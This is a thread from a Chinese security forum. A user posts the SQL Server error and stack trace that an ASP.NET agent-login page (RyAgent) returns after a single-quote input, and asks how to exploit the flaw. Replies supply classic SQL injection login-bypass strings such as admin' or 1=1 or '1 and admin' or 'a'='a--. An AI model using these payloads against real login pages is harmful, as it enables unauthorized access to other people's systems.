议题提交：haicao
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

一个asp.net程序的用户后台登入点。怀疑存在sql注入，但提示有点怪，在这里寻求帮助。

已知用户名框输入为：aaaa'密码框输入为bbbb
用户类型选了第一个值为1提交后提示如下：

复制内容到剪贴板

代码:

“/”应用程序中的服务器错误。
--------------------------------------------------------------------------------

第 1 行: '08' 附近有语法错误。字符串 '' 之前有未闭合的引号。
说明: 执行当前 Web 请求期间，出现未处理的异常。请检查堆栈跟踪信息，以了解有关该错误以及代码中导致错误的出处的详细信息。

异常详细信息: System.Data.SqlClient.SqlException: 第 1 行: '08' 附近有语法错误。字符串 '' 之前有未闭合的引号。

源错误:

执行当前 Web 请求期间生成了未处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。  

堆栈跟踪:


[SqlException: 第 1 行: '08' 附近有语法错误。
字符串 '' 之前有未闭合的引号。]
  RyAgent.DataProvider.GetDataReader(String SQL)
  RyAgent.Login.CheckAgentUser(String strUserName, String strPassword)
  RyAgent.Login.ImageButton1_Click(Object sender, ImageClickEventArgs e)
  System.Web.UI.WebControls.ImageButton.OnClick(ImageClickEventArgs e) +109
  System.Web.UI.WebControls.ImageButton.System.Web.UI.IPostBackEventHandler.RaisePostBackEvent(String eventArgument) +69
  System.Web.UI.Page.RaisePostBackEvent(IPostBackEventHandler sourceControl, String eventArgument) +18
  System.Web.UI.Page.RaisePostBackEvent(NameValueCollection postData) +33
  System.Web.UI.Page.ProcessRequestMain() +1292




--------------------------------------------------------------------------------
版本信息: Microsoft .NET Framework 版本:1.1.4322.2300; ASP.NET 版本:1.1.4322.2300

这一句不理解怎么回事？
第 1 行: '08' 附近有语法错误。字符串 '' 之前有未闭合的引号。
怎么写才能语法正确？

admin' or 1=1 or '1
sql=select * from admin where username='admin' or 1=1 or '1'

admin' or 'a'='a-- 行吗?

少了一个‘号，加上就符合查询条件了